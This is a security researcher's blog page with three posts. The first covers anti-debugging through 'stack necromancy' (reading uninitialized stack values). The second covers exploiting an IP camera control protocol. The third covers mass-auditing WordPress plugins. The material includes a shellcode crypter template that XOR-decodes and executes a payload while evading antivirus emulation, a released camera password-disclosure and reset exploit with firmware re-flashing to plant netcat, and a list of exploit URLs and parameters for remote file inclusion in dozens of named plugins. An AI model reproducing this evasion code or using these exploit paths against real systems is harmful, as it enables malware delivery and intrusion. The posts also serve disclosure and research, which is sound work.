
14 Feb 2012

Stack Necromancy: Defeating Debuggers By Raising the Dead

This article presupposes a basic understanding of how function calls and stacks work. If you'd like to learn or need a refresher, Wikipedia is always a good place to start.

Introduction

Referencing uninitialized memory is a fairly common programming mistake that can cause a variety of seemingly bizarre behaviors in otherwise correct code. For the uninitiated, take a look at CERT's secure coding guide for more info. In short, the core problem is that a program may reuse memory that has already been touched elsewhere in the application. Because that memory is not cleared automatically, for performance reasons, it must be explicitly set to an expected value, or one risks introducing unexpected behavior. Uninitialized memory references often go unnoticed, as the code will work just fine so long as the uninitialized memory doesn't happen to contain an unfortunate value.

Interesting, but what does this have to do with detecting debuggers? Well, contrary to what many think, the value stored at a given uninitialized address can actually be quite predictable, especially when it comes to stack data. This is because the stack normally contains data left over from previous function calls. If the same series of functions gets called before a given function receives control, many of the values stored on the dead stack will be identical between runs. What this means is that if a debugger changes a process's dead stack space in any way, say by triggering extra function calls before our detection function runs, an application should be able to detect the difference between the normal state and the debugged state.
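
To make the idea concrete, here's a minimal toy sketch (mine, not part of the original detection code): one function deliberately leaves a value behind in its stack frame, and a second function called at the same depth often finds that value in its own uninitialized local. Note that reading an uninitialized variable is undefined behavior per the C standard, so this is compiler- and flag-dependent; with MinGW GCC at -O0 it typically behaves as described.

#include <stdio.h>

/* leave() stores a recognizable value in its frame; peek() runs next at
   the same call depth, so its uninitialized local usually lands on the
   same stack slot and "sees" the dead value. Compile without
   optimization to observe this reliably. */
void leave(void){
    volatile int ghost = 0xdeadbeef;  /* value left behind on the dead stack */
    (void)ghost;
}

void peek(void){
    int raised;                       /* deliberately uninitialized */
    printf("raised from the dead stack: 0x%08x\n", raised);
}

int main(void){
    leave();
    peek();
    return 0;
}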

The Dead Live Again

Surely Windows wouldn't alter the stack when it's debugging a process...this could cause unanticipated behavior, especially when trying to debug uninitialized memory references! However, it appears that the Windows debugging API does just that. The following is a simplified version of the code I was writing when I first stumbled onto this issue:

#include <windows.h>
#include <tlhelp32.h>
#include <stdio.h>

void dbgchk(){
    HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE,0);
    //Comment out res=-1 for less magic (res exists only to shift the stack layout)
    DWORD res = -1;
    if(hSnapshot == INVALID_HANDLE_VALUE)
        printf("Something bad happened");
    //Deliberately left uninitialized: mod.dwSize inherits whatever the dead stack holds
    MODULEENTRY32 mod;
    if(!Module32First(hSnapshot,&mod)) {
        printf("Debugger detected!");
        CloseHandle(hSnapshot);
        return;
    }
    CloseHandle(hSnapshot);
    printf("Not a debugger!");
}
 
int main(){
    dbgchk();
    return 0;
}

Code and executable

When compiled using MinGW32 4.5.4 and run on Windows 7 32/64 bit, this code should correctly detect the presence of a debugger.

Let's look into what exactly is happening here. At first glance, nothing appears too overtly wrong (besides the uninitialized mod variable), and certainly nothing that seems like it should detect the presence of a debugger. One might be tempted to think that the API calls rely on some system functionality that behaves differently when debugged, a technique already common in anti-reverse engineering. However, inspection in Olly reveals that this is not the case. Something more subtle is happening here.

Ollydbg in Mod32First call

As you can see, when we first enter the Module32First function, checks are performed on the mod variable, including one that reads the stack address 0x0022fc84 (which points to the dwSize field of the MODULEENTRY32 struct passed in) to see whether the value there is greater than 0x243, the size of a MODULEENTRY32 structure. If this check fails, the function returns an error immediately. In the stack state shown above, this location holds 0, so we know the check will fail. Because the check passes when we run without a debugger, there must be a different value stored at this address during normal operation. An appropriately placed printf reveals that a stack address, 0x0022fd60, sits in place of the 0 when run without the debugger, allowing the function to proceed as normal.
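
If you want to see this for yourself, a probe along the following lines (a sketch; reading the uninitialized field is, of course, exactly the undefined behavior the technique depends on) prints whatever dead-stack value dwSize inherits before Module32First ever sees it:

#include <windows.h>
#include <tlhelp32.h>
#include <stdio.h>

/* Dump the dead-stack value that becomes mod.dwSize. Run with and
   without a debugger attached and compare the output. */
void probe(void){
    MODULEENTRY32 mod;  /* deliberately uninitialized */
    printf("dwSize before init: 0x%08lx\n", (unsigned long)mod.dwSize);
}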

I mentioned earlier that the state of the dead stack depends on the functions that have run previously. This helps explain why the stack differs when debugged vs. not. Most (all?) debuggers on Windows make extensive use of the debugging API during normal operation, given how easy it is to use and how much power it provides. A debugger can attach to a process in two ways: it can attach at process startup by passing the correct flags to CreateProcess, or it can call DebugActiveProcess to attach to one that is already running. When you open an executable directly in one of these debuggers, it will use the CreateProcess method and wait for a CREATE_PROCESS_DEBUG_EVENT to occur. During this time, Windows calls all the functions necessary to instantiate the process, including those that set up the debugging objects in the process space. Because of this, Windows behaves differently when loading a debugged process than an undebugged one, and that means (you guessed it!) different function calls and different dead stack values.
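
For reference, here is roughly what that first attach path looks like from the debugger's side (a generic sketch, not any particular debugger's code). Everything Windows does between the CreateProcess call and the delivery of CREATE_PROCESS_DEBUG_EVENT is what perturbs the target's dead stack:

#include <windows.h>
#include <stdio.h>

/* Spawn a target under the debugging API and wait for the initial
   CREATE_PROCESS_DEBUG_EVENT, the point at which debuggers typically
   take over. cmdline must point to a writable buffer. */
int debug_spawn(char *cmdline){
    STARTUPINFO si = {0};
    PROCESS_INFORMATION pi = {0};
    DEBUG_EVENT ev;
    si.cb = sizeof(si);

    if(!CreateProcess(NULL, cmdline, NULL, NULL, FALSE,
                      DEBUG_ONLY_THIS_PROCESS, NULL, NULL, &si, &pi))
        return -1;

    while(WaitForDebugEvent(&ev, INFINITE)){
        if(ev.dwDebugEventCode == CREATE_PROCESS_DEBUG_EVENT){
            printf("process %lu created under debugger\n", ev.dwProcessId);
            CloseHandle(ev.u.CreateProcessInfo.hFile);
            break;
        }
        ContinueDebugEvent(ev.dwProcessId, ev.dwThreadId, DBG_CONTINUE);
    }
    return 0;
}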

Already, this looks like a rather interesting anti-debugging technique. I haven't been able to find any previous description of it, but it's entirely possible my Google-fu is just weak. I refer to it as stack necromancy, given that it centers around the manipulation of previously dead stack values. Defeating it automatically seems to require foreknowledge of exactly how the dead stack should look to an application, which is certainly a higher bar than, say, setting the IsDebugged flag in the PEB to 0. If one can align the stack so that certain API calls fail while being debugged but pass when not, one can easily create some rather cryptic checks for the presence of a debugger. Any API call that fails when certain values are passed to it could potentially be used to trigger the detection.

Improving Our Spells

Now that we know we can detect the presence of a debugger, seemingly trivially, inside any number of API calls: what next? A reverse engineer can just nop out the check once he finds it, and, although this check is more subtle than most, a dedicated person would track it down. It would be nice if we could also make the entire operation of an executable dependent on the differences in the stack. There are two obvious ways to do this: use the trick shown above to cause a number of necessary API calls to fail during debugging (for instance, by abusing LoadLibrary), or use values pulled off the dead stack to encrypt necessary data. Thankfully for us, the dead stack is relatively stable, so we can do both. The following examples are still relatively easy to patch, but they show the kinds of things one might do.

Here's an example of some stack necromancy using LoadLibrary, a straightforward API function that applications often call during normal execution, and whose failure would plausibly break an application outright:

#include <windows.h>
#include <stdio.h>
 
void dbgchk7(){
    char res[298];     //padding: pushes lib to the right stack position on Win7
    //12 bytes: the null terminator is deliberately omitted, so LoadLibrary
    //reads whatever dead-stack byte follows the array
    char lib[12] = "kernel32.dll";
    if(LoadLibrary(lib)){
        printf("Win 7: Not debugged!\n");
        return;
    }
    printf("Win 7: Debugged!\n");
}
 
void dbgchkxp(){
    char res[53];      //padding: a different offset is needed on XP
    char lib[12] = "kernel32.dll";
    if(LoadLibrary(lib)){
        printf("XP: Not debugged!\n");
        return;
    }
    printf("XP: Debugged!\n");
}
 
BOOL chkxp(){
    //Build an absolute stack address: keep the 0x00FF0000 bits of a live
    //stack address, hardcode the low 16 bits, then test a byte that
    //differs between XP and Win7
    UINT *ptr = (UINT *)((((UINT)&ptr) & 0x00FF0000)|0xfe0c);
    return ((*ptr)&0xff)==0x00;
}
 
int main(){
    //Detect OS first to avoid mangling the dead stack
    if(chkxp())
        dbgchkxp();
    else
        dbgchk7();
    return 0;
}

Code and executable

Take a minute to look at the above code. Once again, nothing about the actual detection code seems like it should be able to tell whether an application is being debugged. This sample does, in fact, exploit the same issue, just in a slightly different way. Rather than making a length field fail a check, this code works by omitting the null terminator from the string containing the module name to be loaded. This means the LoadLibrary call will fail or succeed depending on the character immediately following the lib array. By placing the array at a position on the stack where a different value (null or otherwise) will be stored immediately after the string, we can get the call to behave differently when being debugged.

To get this to work on both XP and Windows 7, I had to do two main things: first, detect the OS without disturbing the stack, and second, push the lib array to an appropriate place by adding local variables to each function. The OS detection is not strictly necessary here, but it made my life easier: the first LoadLibrary call significantly changes the stack, making appropriate values more difficult to find, and finding a single offset that works on both systems is a bit frustrating. Normally, OS detection would be done through a Windows API call, but again, we want as small a footprint as possible to avoid disturbing the stack. Instead, we can use the same technique we're using to detect the debugger: simply grab a chosen value off the stack and check whether it matches an expected value.

The offsets used here were chosen rather arbitrarily, largely by glancing over dumps of the stack state at the desired time, debugged vs. not. I have yet to come up with a good way to automate that process, beyond a few stupid bits of code to print out portions of the uninitialized stack (one is sketched below). I have found that locations higher up (at lower addresses) in the dead stack are more likely to differ, probably because they are largely left over from process setup and are less likely to have been overwritten by identical later calls. The values lower in the dead stack, however, seem to be more stable, so there's a tradeoff. The nice thing about the approach is that there's no shortage of possible values to choose from; you're bound to find suitable values for what you want to do.
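
For the curious, the stupid bits of code look something like the following (a sketch; the window size and anchoring are arbitrary choices). One subtlety: the snapshot has to be taken before calling anything else, because printf's own frame would overwrite the very dead stack being dumped.

#include <stdio.h>

#define DEAD_WINDOW 64  /* words of dead stack to dump; arbitrary */

static unsigned int snap[DEAD_WINDOW];  /* static so the copy itself doesn't live on the stack */

/* Copy a window of the dead stack below the current frame, then print
   it. Diff the output of a debugged run against a normal one to find
   candidate offsets. */
void dump_dead_stack(void){
    unsigned int i;
    unsigned int *anchor = (unsigned int *)&i;   /* a live stack address */
    for(i = 0; i < DEAD_WINDOW; i++)
        snap[i] = *(anchor - 1 - i);             /* walk down into dead space */
    for(i = 0; i < DEAD_WINDOW; i++)
        printf("%p: %08x\n", (void *)(anchor - 1 - i), snap[i]);
}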

Here is an example of using stack necromancy to pull encryption values out of the stack graveyard, which causes the application to fail if it is being debugged:

#include <windows.h>
#include <stdio.h>
 
UCHAR msg[] = "\x06\x30\x2b\x2c\x29\x62\x2f\x2d\x30\x27\x62\x2d\x34\x23\x2e\x36\x2b\x2c\x27\x6c";
void print_results(UCHAR key){
    int i;
    for(i=0;i<20;i++)
        msg[i] = msg[i] ^ key;
    printf("%s", (char *)msg);   //not used as a format string, in case decryption goes wrong
    printf("\n\nWritten by supernothing, level 90 necromancer.\n");
}
 
void decodemessage(){
    //Same base-address trick as before: live stack bits | hardcoded offset
    UINT *ptr = (UINT *)((((UINT)&ptr) & 0x00FF0000)|0xfe0c);
    if(((*ptr)&0xff)==0x00){
        //WinXP 32bit: the key byte lives at a different stable offset
        ptr = (UINT *)((((UINT)&ptr) & 0x00FF0000)|0xfdc8);
        print_results(((((*ptr)&0xff0000)>>16)^0x83));
    } else {
        //Win7 32 bit and 64 bit
        ptr = (UINT *)((((UINT)&ptr) & 0x00FF0000)|0xfdd0);
        print_results(((*ptr)&0xff)^0xb6);
    }
}
 
int main(){
    decodemessage();
    return 0;
}

Code and executable

While this is a somewhat simple example (I doubt a single-byte XOR key is going to worry anyone), it shows that it is possible to resurrect dead stack values and use them as encryption keys. This code was tested on 32-bit Windows XP and 32/64-bit Windows 7; it works correctly when run normally, but fails miserably in a debugger. Here, I simply determine which system I'm running on and map the appropriate byte to the correct key via an XOR. It uses the same hardcoded OS version check offset (0xfe0c) as the previous example for convenience, then pulls the appropriate value from known stable addresses and uses it as a key. The same sort of code could easily gather a much larger key for use with a decent crypto algorithm.
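
As a hedged sketch of that idea (the offsets below are hypothetical placeholders, not harvested values; real ones would have to be pulled from stack dumps per OS, exactly like the single bytes above), a larger key could be gathered one byte at a time:

#include <windows.h>

#define KEY_LEN 4  /* extend once enough stable offsets are found */

/* Gather one byte from each of several dead-stack offsets into a key
   buffer, using the same live-stack-bits | hardcoded-offset trick as
   the examples above. */
void gather_key(UCHAR *key){
    /* hypothetical offsets near the known-stable 0xfdd0 */
    static const UINT offs[KEY_LEN] = { 0xfdd0, 0xfdd4, 0xfdd8, 0xfddc };
    UINT i, base = ((UINT)&i) & 0x00FF0000;
    for(i = 0; i < KEY_LEN; i++)
        key[i] = (UCHAR)(*(UINT *)(base | offs[i]));
}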

This technique is not only useful against debuggers, however: it is arguably even more useful for defeating the dynamic code emulation that antivirus applications use to try to detect packed code. AV emulators also make telltale changes to the stack space, which allows an attacker to prevent their code from being dynamically unpacked in one of these environments. In a previous post, I talked about writing a simple crypter to bypass AV, where I used a timing attack to defeat emulation. We can see from these VirusTotal results that the same stack necromancy we used above achieves similar results: without emulation defeat / with emulation defeat. The detection by CAT-QuickHeal is based on a generic unpacking signature that appears to center on large buffers being XORed, as it still fires when the shellcode is non-functional.

Without defeat

#include <windows.h>
#include <stdlib.h>
UCHAR sc[] = YOUR_SHELLCODE_HERE;
 
UCHAR key;
 
int main(){
    key = 0x42;                 //hardcoded key: trivial for an emulator to follow
    int SC_LEN = 2477;
    int i;
    UCHAR* tmp = (UCHAR *)malloc(SC_LEN);
 
    for(i=0; i<SC_LEN; i++){
        tmp[i]=sc[i]^key;
    }
 
    ((void (*)())tmp)();        //note: assumes DEP permits executing heap memory
 
    return 0;
}

With defeat

#include <windows.h>
#include <stdlib.h>
UCHAR sc[] = YOUR_SHELLCODE_HERE;
 
UCHAR key;
 
void getdecodeinfo(){
    //Get base address, then pull the key byte straight off the dead stack;
    //an emulator's stack won't hold the right value, so decryption fails
    UINT ptr = (((UINT)&ptr)&0x00FF0000)+0xfb1c;
    if(((*(UINT *)ptr)&0xff)==0x24){
        //WinXP 32bit
        key = ((((*(UINT *)ptr)&0xff00)>>8)^0x4e);
    } else {
        //Win7 32 bit and 64 bit
        key = ((*(UINT *)ptr)&0xff)^0x4a;
    }
}
 
int main(){
    getdecodeinfo();
    int SC_LEN = 2477;
    int i;
    UCHAR* tmp = (UCHAR *)malloc(SC_LEN);
 
    for(i=0; i<SC_LEN; i++){
        tmp[i]=sc[i]^key;
    }
 
    ((void (*)())tmp)();
 
    return 0;
}

This particular class of defeats is extra nice, however, as it can't be optimized out like many time-based ones, yet remains quite generic and hard to detect with signatures. After all, many applications inadvertently reference uninitialized memory; triggering on that alone could significantly increase false positives.

Machetes Are Your Friend

Bypassing the techniques I've presented here is by no means impossible, but they do present an obstacle to reverse engineering. Because of the generality of the technique, and the large number of ways to use it, a "general" defeat would take some effort to develop. The best strategy I have come up with so far is to create the process in a suspended state without debugging it, dump the stack state, re-run the application under the debugger, and write the expected dead stack into the process. Something along these lines *should* work, but I have not tested any of it.
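
Along those lines, here is a rough (and equally untested) sketch of the snapshot half, assuming a 32-bit target: start the process suspended, find ESP from the main thread's context, and read a window of stack below it. A debugger-side tool could then WriteProcessMemory() the snapshot into a debugged instance before resuming it.

#include <windows.h>

#define SNAP_BYTES 0x1000  /* how much stack to snapshot; arbitrary */

/* Spawn the target suspended (no debugger involved), locate its stack
   via the initial thread's context, and copy out the region below ESP,
   where the dead values live. The process is killed afterwards. */
int snapshot_stack(char *cmdline, BYTE *out){
    STARTUPINFO si = {0};
    PROCESS_INFORMATION pi = {0};
    CONTEXT ctx = {0};
    SIZE_T got = 0;
    si.cb = sizeof(si);

    if(!CreateProcess(NULL, cmdline, NULL, NULL, FALSE,
                      CREATE_SUSPENDED, NULL, NULL, &si, &pi))
        return -1;

    ctx.ContextFlags = CONTEXT_CONTROL;          /* we only need Esp */
    GetThreadContext(pi.hThread, &ctx);
    ReadProcessMemory(pi.hProcess, (LPCVOID)(ctx.Esp - SNAP_BYTES),
                      out, SNAP_BYTES, &got);

    TerminateProcess(pi.hProcess, 0);
    CloseHandle(pi.hThread);
    CloseHandle(pi.hProcess);
    return (int)got;
}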

Defeating individual implementations, however, is definitely doable. The main challenge, as alluded to above, is finding where the detection happens. Malware is not going to be as kind to the reverse engineer as my examples are. A sample might well detect the debugger during application startup and then continue on its merry way until some point in the future. Because of how subtle the check can be, and how many different ways it can be used, the offending memory accesses can be difficult to find. Carefully inspecting each function for accesses to uninitialized memory is probably too tedious to be feasible, so automation in the form of memory analysis tools is likely a must. There are a number of these tools for Windows, and most of them would probably work. Once the check is found, it can be patched like most other debug defeats. The exceptions are implementations that pull values from the stack rather than just checking them; these will require modifying the binary to print the value and then running the code without a debugger.

The biggest concern for those performing stack necromancy is that Microsoft or an AV company will intentionally attempt to mangle the call sequence executed during application startup. This would be the obvious response in my mind to prevent malicious software from using it. If this happened, it would obviously render the application inoperative. For this reason, it may make sense to fail more gracefully here than with other techniques, falling back to an update mechanism of some kind to receive a fix.

As for defending against this technique in an AV's emulator, the only real way I can see is to perfectly simulate the runtime environment of the given process, down to the state of the empty stack. Unless you're doing that, these kinds of defeats should always work. However, I would love to see myself proved wrong.

Enough For Today

Sadly, that's about all I have on the wonderful world of dead stacks for this post. Due to the nature of the code I've posted above, it obviously may not work on your particular system. I've been pretty thorough about testing it on various VMs and computers I have lying around, but that definitely doesn't preclude it breaking elsewhere. I've already identified a few things that can cause it to fail, namely certain intrusive AV techniques such as DLL injection, as well as differing OS versions. In fact, anything that affects the state of the stack before the application's main is reached could potentially disrupt it. If it's not working for you, feel free to let me know (preferably with suggestions as to why it fails and/or cleverly worded insults about my puny human brain).

Hopefully, I have been able to demonstrate some of the very interesting things that can be done by resurrecting dead stack values and using them to do one's bidding. There are doubtless many more ways that people could improve upon the techniques I have discussed here, and I look forward to hearing about them. Happy hacking.

23 Jan 2012

Exploiting an IP Camera Control Protocol: Redux

Last May, I wrote about a remote password disclosure vulnerability I found in a proprietary protocol used to control ~150 different low-end IP cameras. The exploit I wrote was tested on the Rosewill RXS-3211, a rebranded version of the Edimax IC3005. The vulnerability remained unpatched in the RXS-3211 until July of last year, when a supposed fix was provided. Unfortunately, I've been busy with other projects, so I only recently got around to testing it. Spoiler: the results weren't good. The following post documents how easy it still is to exploit this particular vulnerability, alternative ways to exploit the protocol, and how to create your own firmware images to run whatever you want on devices that you now control.

The Patch Is 0.1% Effective

After flashing the latest firmware image to one of my cameras and installing the new management application, I did exactly what I did the first time: fired up Wireshark and looked through the traffic. It was clear from the dumps that they were at least obfuscating the traffic now, but the sad fact remained that when I entered my password into the client application, no traffic was sent to the server before I was granted access. Clearly, authentication in the protocol is still occurring client-side. Not good.

With that knowledge, I thought it'd be fun to first explore what one can do without even having the admin password. Thankfully, this was much easier than expected, thanks to my fateful acquisition of Edimax's implementation of the protocol. While working on creating custom firmware images, I had downloaded a number of GPL source packages released by Edimax. In the IC3010 package, I realized that Edimax had included more source code than usual, including one folder labeled "enet_EDIMAX". After a quick look, I realized I now had the source to the protocol I had been reversing. Win.

Rather than describing what one can do while unauthenticated, it would probably be faster to describe what one *can't* do. Reboots, factory resets, reading any and all device settings, performing WLAN surveys, toggling LEDs...it is even possible to perform remote, unauthenticated firmware flashing on some models. Basically, the only thing that isn't possible is grabbing remote frames from the camera. You can read through the code for yourself here: enet_agentd.h, enet_agentd.c. After some quick Python scripting, I confirmed that all of the supported functions on the RXS-3211 were still vulnerable to exploitation, even if the admin password was no longer sent in cleartext. If anyone reading has one of the cameras that supports wireless or firmware flashing (IC-1000, maybe others), I'd love to see if the rest of the enet functionality works.

Obviously, the patch wasn't very effective. However, for the sake of curiosity and thoroughness, I wanted to see if it was still possible to recover the admin password. Doing so meant figuring out how the traffic was being encoded, and whether that encoding could be defeated. The header format I described in my previous post was still intact, but the body was obviously scrambled somehow. While this could have required a serious reverse engineering effort, it turned out to be fairly simple.

In such situations, there are only a few options: encryption, compression, or both. After changing the password on the device a few times and observing how the traffic changed, it became obvious that either very weak encryption was being used or the data was compressed, as there was an easily discernible pattern between the input text and the output. Comparing the passwords "1111111111" and "1234567890" made it clear that compression was the winner: packets containing the former password were a few bytes shorter than those containing the latter. Compression algorithms often work by shrinking 'runs' of data in some way, and hence will compress the same character repeated in succession much more efficiently than different ones. To find out which algorithm, I went back and ran strings on the management executable, which gave me my answer: zlib. Yes...their solution to remote password disclosure was to compress the password before sending it. Brilliant. After this, all it took was a single line of Python to make things work perfectly again: zlib.decompress(data[12:-4],-15).
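
For those following along in C rather than Python, the equivalent raw inflate looks something like this (a sketch with minimal error handling; the -15 windowBits tells zlib the body carries no zlib header, matching the -15 in the Python call):

#include <string.h>
#include <zlib.h>

/* Strip the 12-byte enet header and 4-byte trailer, then raw-inflate
   the body into out. Returns the decompressed length, or -1 on error. */
int enet_decompress(const unsigned char *pkt, unsigned int pktlen,
                    unsigned char *out, unsigned int outlen){
    z_stream zs;
    int ret;
    memset(&zs, 0, sizeof(zs));
    if(pktlen <= 16 || inflateInit2(&zs, -15) != Z_OK)
        return -1;
    zs.next_in   = (Bytef *)(pkt + 12);  /* skip header */
    zs.avail_in  = pktlen - 12 - 4;      /* drop trailer */
    zs.next_out  = out;
    zs.avail_out = outlen;
    ret = inflate(&zs, Z_FINISH);
    inflateEnd(&zs);
    return (ret == Z_STREAM_END) ? (int)zs.total_out : -1;
}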

To demonstrate these vulnerabilities, I threw together a simple Python script: enet_pwn.py. With this, an attacker can disclose the admin password and others stored on all devices using the enet protocol (including the "patched" RXS-3211),  grab many of the common settings shared between devices, and perform reboots and factory resets on the cameras. Obligatory disclaimer: I am not responsible for any illegal use of this tool.

Going Further

For all the vulnerabilities I've pointed out in their software, I still really like the Edimax cameras for their low cost and high "hackability". Creating firmware images for the devices lets you do some cool things other cameras can't, and at ~30 dollars for the low-end ones, it's a pretty good deal. In fact, the first time I bought one, I had actually considered turning it into a poor man's pentesting drop box (which it does quite well). However, because of how easy it is to create firmware images for the cameras, attackers can also install anything they like once they get the admin password. This could allow them to gain further unauthorized access to a network.

While creating custom firmware for these cameras is a little more complicated than simply using the firmware mod kit, it isn't by much. I've created a few basic scripts that handle everything, which basically just automate the process described here. All someone needs to do is use the extract_edimax.sh script to extract the image, modify the root filesystem to their liking, and then rebuild with the build_edimax.sh script. Edimax provides a toolchain for compiling your own applications, which can also be found in my repository in the tools directory. For me, getting netcat on there was enough for everything I wanted. I should note, though, that any flashing you do could damage your device, so be careful. It is usually possible to recover through a serial terminal on the device, but it's best to avoid that annoyance.

Mitigation

For end users, the easiest thing to do is simply to block incoming UDP packets on port 13364. It's possible to make your own firmware image that isn't vulnerable, but this is left as an exercise for the reader (or possibly a later post).

For the developers, here is, once again, some possible pseudocode for the server:

if discovery request:
    allow
else if any other valid request encrypted with admin password hash:
    allow
else:
    deny deny deny

Never send cleartext passwords. Don't even send hashes unless you have to. And definitely don't send them to clients. It's not that complicated. If you can't do that much, you shouldn't be rolling your own protocols.
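
For what it's worth, here is one hedged way the "valid request encrypted with admin password hash" line could be implemented server-side (a sketch using an HMAC rather than literal encryption, with OpenSSL for the primitives; the field layout is my own hypothetical choice, not enet's):

#include <stddef.h>
#include <openssl/evp.h>
#include <openssl/hmac.h>
#include <openssl/crypto.h>

/* Authenticate a non-discovery request: recompute HMAC-SHA256 over the
   request body, keyed on the stored password hash, and compare against
   the MAC the client sent, in constant time. */
int request_ok(const unsigned char *body, size_t bodylen,
               const unsigned char *claimed_mac,   /* 32 bytes, from the packet */
               const unsigned char *pw_hash, size_t hashlen){
    unsigned char mac[32];
    unsigned int maclen = sizeof(mac);
    if(!HMAC(EVP_sha256(), pw_hash, (int)hashlen,
             body, bodylen, mac, &maclen))
        return 0;
    return CRYPTO_memcmp(mac, claimed_mac, sizeof(mac)) == 0;
}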

18 Sep 2011

Explo(it|r)ing the WordPress Extension Repos

Today's post is kind of long, so I thought I should warn you in advance by adding an additional paragraph for you to read. I also wanted to provide download links for those who'd rather just read the code. It isn't the cleanest code in the world, so I apologize in advance. I discuss what all of these are for and how they work later on in the post, so if you're confused and/or curious, read on. Downloads:

  • Copies of the WordPress theme and plugin repositories can be grabbed via torrent (Please note that the plugin repo has a few directories incomplete/missing; this can be fixed by running my checkout code)
  • A new WordPress plugin fingerprinting tool, wpfinger (download). This tool can infer detailed version information on just about every plugin in the WordPress repository. This package also contains some useful libraries for checking out the repositories and scraping plugin rankings, as this is used in the fingerprinting tool.

Intro

After finding an arbitrary file upload vulnerability in 1 Flash Gallery, I became curious as to how many other WordPress plugins made basic security mistakes. The 1 Flash Gallery issue, it seems, is that the developers CTRL-C-V'd code from a project called Uploadify, which has been known to be vulnerable for quite a while.

This made me wonder how many plugins make easy-to-spot security mistakes, such as reusing vulnerable libraries or doing things like include($_REQUEST['lulz']). However, my curiosity was initially hampered by the fact that downloading and auditing every WordPress plugin one at a time is not only a mind-numbing task, but a herculean one as well. And, well, I'm incredibly lazy.

Getting the Repos

So what to do? Well, it turns out that WordPress is nice enough to have public repositories (http://plugins.svn.wordpress.org and http://themes.svn.wordpress.org) containing all plugins that have ever been submitted, as well as every theme.  This, of course, was exciting: I could just check this out, whip out some grep-fu, and have my answers.

Alright, so maybe it isn't as simple as that. First, the plugin repo is huge: as is, it's taking up a good 80GB on one of my disks and contains approximately 12,000,000 files, thanks in no small part to subversion's insistence on creating ridiculous numbers of internal files. This isn't all that surprising, however, given that the repo contains ~23,000 plugins.

As I found out in my initial failed attempts to grab the code, checking this all out at once with subversion is, as far as I can tell, impossible. After about 15-20 minutes of downloading, the checkout would error out, and I'd have to wait for SVN to reverify everything it had already gotten. This got old quickly, so I came up with a hacky workaround: a quick script that simply checked out the individual repository for every plugin and theme. Not very clean, but for my purposes, effective. A little over a day later, I had all the themes and plugins, and it was time for some fun.

A side note: for those of you who would like to play with either of these, I'd recommend grabbing the torrent, extracting it, and then running my checkout script in wpfinger in the directory above them. This will still get you the latest versions of all the plugins, but should take significantly less time and put less strain on everyone's servers.

Attack

Anyway, on to the vulnerabilities. During my scans I found remote unauthenticated code execution vulnerabilities in 36 plugins, varying in popularity from ~250 downloads to ~60,000. Finding them took essentially no effort or skill on my part, just patience.

The following plugins were found entirely with grep and a little bit of manual inspection. Instead of running over every PHP file in the repo, I sped things up by only scanning code in the trunk directories, on the assumption that the trunk holds the latest code. Pretty much all of these were found analyzing results from the same grep:

Grep used: egrep -i '(include|require)(_once)?(\(|\s+)[^[;)]*\$_(REQUEST|GET|POST|COOKIE)'

Base is http://host/wp-content/plugins/PLUGIN_NAME/ unless explicitly stated.

Remote File Include - unauthenticated
----------------------------------------------------------

  • zingiri-web-shop = /fws/ajax/init.inc.php?wpabspath=RFI OR /fwkfor/ajax/init.inc.php?wpabspath=RFI
  • mini-mail-dashboard-widget = wp-mini-mail.php?abspath=RFI (requires POSTing a file with ID wpmm-upload for this to work)
  • mailz = /lists/config/config.php?wpabspath=RFI
  • relocate-upload = relocate-upload.php?ru_folder=asdf&abspath=RFI
  • disclosure-policy-plugin = /functions/action.php?delete=asdf&blogUrl=asdf&abspath=RFI
  • wordpress-console = /common.php POST="root=RFI"
  • livesig = /livesig-ajax-backend.php POST="wp-root=RFI"
  • annonces = /includes/lib/photo/uploadPhoto.php?abspath=RFI
  • theme-tuner = /ajax/savetag.php POST="tt-abspath=RFI"
  • evarisk = /include/lib/actionsCorrectives/activite/uploadPhotoApres.php?abspath=RFI
  • light-post = /wp-light-post.php?abspath=RFI

Local File Include - unauthenticated
----------------------------------------------------------

  • news-and-events = http://host/wordpress/?ktf=ne_LFIPATH%00

As an experiment, I also modified a nice static source analyzer called RIPS to take command line arguments (grab here, if interested) and print out some basic information on probable vulnerabilities, and then ran it over the plugin repo. Unfortunately, the noise was still pretty high (partly due to its lack of OO support), so I didn't find all too much beyond the greps. However, it did turn up a few RFIs:

  • thecartpress = /checkout/CheckoutEditor.php?tcp_save_fields=true&tcp_class_name=asdf&tcp_class_path=RFI
  • allwebmenus-wordpress-menu-plugin = actions.php POST="abspath=RFI"
  • wpeasystats = export.php?homep=RFI

Finally, I searched for Uploadify usage and outdated timthumb.php libraries. This turned up another 24 vulnerable plugins:

  • user-avatar - /user-avatar-pic.php -> Only vulnerable if register_globals is enabled
  • onswipe - /framework/thumb/thumb.php
  • islidex - /js/timthumb.php
  • seo-image-galleries - /timthumb.php
  • verve-meta-boxes - /tools/timthumb.php
  • dd-simple-photo-gallery - /include/resize.php
  • wp-marketplace - /libs/timthumb.php
  • a-gallery - /timthumb.php
  • auto-attachments - /thumb.php
  • cac-featured-content - /timthumb.php
  • category-grid-view-gallery - /includes/timthumb.php
  • category-list-portfolio-page - /scripts/timthumb.php
  • cms-pack - /timthumb.php
  • dp-thumbnail - /timthumb/timthumb.php
  • extend-wordpress - /helpers/timthumb/image.php
  • kino-gallery - /timthumb.php
  • lisl-last-image-slider - /timthumb.php
  • mediarss-external-gallery - /timthumb.php
  • really-easy-slider - /inc/thumb.php
  • rekt-slideshow - /picsize.php
  • rent-a-car - /libs/timthumb.php
  • vk-gallery - /lib/timthumb.php
  • gpress = /gpress-admin/fieldtypes/styles_editor/scripts/uploadify.php?fileext=php - exact same as 1 Flash Plugin vuln

Obviously, it's not very hard to find a decent number of 0days just by grepping around, which is mildly disconcerting. Honestly, I had so many hits for these searches that I probably missed a good deal of them. But what else, besides vulnerability discovery, can we do with all this data?

Fingerprint

As an attacker, it's always nice to be able to figure out exactly what code is running on a given server. Of course, this isn't usually possible, as it requires a large body of information that just isn't there. However, it becomes much, much easier when you have access to the wealth of information contained in an SVN repo.

I feel I should mention that ethicalhack3r's awesome tool WPScan does some of this, but last I checked it will only detect whether the top 2000 plugins are installed, and, as far as I know, won't give you a version. This is not at all to fault his work; as I said, fine-grained fingerprinting of every plugin would normally be difficult to impossible in most circumstances, and his tool does a ton of stuff that wpfinger doesn't.

